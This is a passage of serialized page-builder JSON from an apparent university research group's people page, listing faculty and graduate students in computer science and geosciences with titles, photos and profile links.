Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anu-bourgeois-09b7b32b\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/anu-bourgeois\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=qsAUgQ8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c39\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c40\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c41\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/08\\/hu_new-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1348,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c42\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Xiaolin Hu\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":2,\"id\":\"182-c43\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c44\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/csds.gsu.edu\\/profile\\/xiaolin-hu\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=zeU19nAAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c45\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c46\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c47\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-patterson.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1391,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c48\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Murray Patterson\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":2,\"id\":\"182-c49\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Assistant Professor&nbsp;<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c50\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/murray-patterson-449a947\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/murray-patterson\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=X4J8vAEAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c51\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c52\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c53\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Taylor-shelton_300x300.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":705,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c54\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Taylor Shelton\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":2,\"id\":\"182-c55\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Assistant Professor<\\/span><\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c56\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/taylor-shelton-28a4b3291\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/taylor-shelton\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=WFA1Ry8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c57\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c58\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c59\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/Hassan-Babaie-300x300-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1634,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c60\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Hassan Babaie\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":2,\"id\":\"182-c61\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c62\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/geosciences.gsu.edu\\/profile\\/hassan-babaie\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Hassan-Babaie\\/4\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c63\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c217\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c217\",\"index\":0,\"id\":\"182-c218\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-Faris-e1697216253732.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1814,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c217\",\"index\":0,\"id\":\"182-c219\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Faris Hawamdeh<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c217\",\"index\":2,\"id\":\"182-c220\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Academic Professional<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c217\",\"index\":1,\"id\":\"182-c221\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/faris-hawamdeh\\/?trk=public_profile_publication_contributor-image\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/faris-hawamdeh\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Faris-Hawamdeh\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c217\",\"index\":1,\"id\":\"182-c222\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"}],\"id\":\"182-c3\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":971,\"type\":\"content\"}],\"id\":\"182-c2\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Faculty\"},\"id\":\"182-c66\",\"parentId\":\"182-c65\",\"partialId\":182,\"styleRef\":986,\"type\":\"content\"}],\"id\":\"182-c65\",\"parentId\":\"182-c64\",\"partialId\":182,\"styleRef\":985,\"type\":\"content\"}],\"id\":\"182-c64\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":984,\"type\":\"content\"}]},\"styleRef\":970,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Grads\",\"attrs\":{\"id\":\"grads\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c69\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c70\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-cropped-282038166_2492815234187345_4129762528023780269_n-e1697205710763.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1742,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c71\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sundos Al Subhi<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c69\",\"index\":2,\"id\":\"182-c72\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c69\",\"index\":3,\"id\":\"182-c73\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sundos-al-subhi-88bb97150\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c69\",\"index\":1,\"id\":\"182-c74\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c75\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c76\",\"partialId\":182,\"styleRef\":849,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/06\\/cropped-cropped-cropped-IMG_1240-scaled-1-e1697205818731.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1744,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c77\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Aaja Christie<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c75\",\"index\":2,\"id\":\"182-c78\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c75\",\"index\":3,\"id\":\"182-c79\",\"partialId\":182,\"styleRef\":901,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/aaja-christie-17573657\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c80\",\"partialId\":182,\"styleRef\":853,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c81\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c82\",\"partialId\":182,\"styleRef\":856,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-Emma-e1697205932363.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1745,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c83\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Emma McDaniel<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c81\",\"index\":2,\"id\":\"182-c84\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"styleRef\":852,\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c85\",\"partialId\":182,\"type\":\"content\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/emmamcdaniel\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=Cwt8OwkAAAAJ&hl=en\"},\"name\":\"socicon\\/googlescholar\"}]},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c86\",\"partialId\":182,\"styleRef\":857,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c87\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c88\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-anupam-e1697206626249.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1747,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c89\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Anupam Sarker<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c87\",\"index\":2,\"id\":\"182-c90\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c87\",\"index\":3,\"id\":\"182-c91\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anupam-sarker-b164b412a\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c92\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c93\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c94\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Ardavan-e1697206676649.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1748,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c95\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ardavan Sassini\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c93\",\"index\":2,\"id\":\"182-c96\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c93\",\"index\":3,\"id\":\"182-c97\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ardavansassani\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c93\",\"index\":1,\"id\":\"182-c98\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c99\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c100\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-Jean-e1697206801281.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1750,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c101\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Jean Guo\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c99\",\"index\":2,\"id\":\"182-c102\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c99\",\"index\":3,\"id\":\"182-c103\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c104\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c104\",\"index\":0,\"id\":\"182-c105\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Basit-e1697206890221.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1752,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c104\",\"index\":0,\"id\":\"182-c106\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Basit Damilare Amuda\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c104\",\"index\":2,\"id\":\"182-c107\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c104\",\"index\":3,\"id\":\"182-c108\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"http:\\/\\/linkedin.com\\/in\\/basit-amuda-227098238\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c104\",\"index\":1,\"id\":\"182-c109\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c110\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c111\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-sara-edwards1-e1697206932891.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1754,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c112\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sara Edwards<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c110\",\"index\":2,\"id\":\"182-c113\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c110\",\"index\":3,\"id\":\"182-c114\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sara-edwards-691b8331\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c110\",\"index\":1,\"id\":\"182-c115\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c116\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c117\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1756,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c118\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ryan Garland<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c116\",\"index\":2,\"id\":\"182-c119\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c116\",\"index\":3,\"id\":\"182-c120\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ryan-g-aa71a0163\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c116\",\"index\":1,\"id\":\"182-c121\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c122\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c123\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Angelique-e1697207062254.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1757,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c124\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Angelique Willis\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c122\",\"index\":2,\"id\":\"182-c125\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s 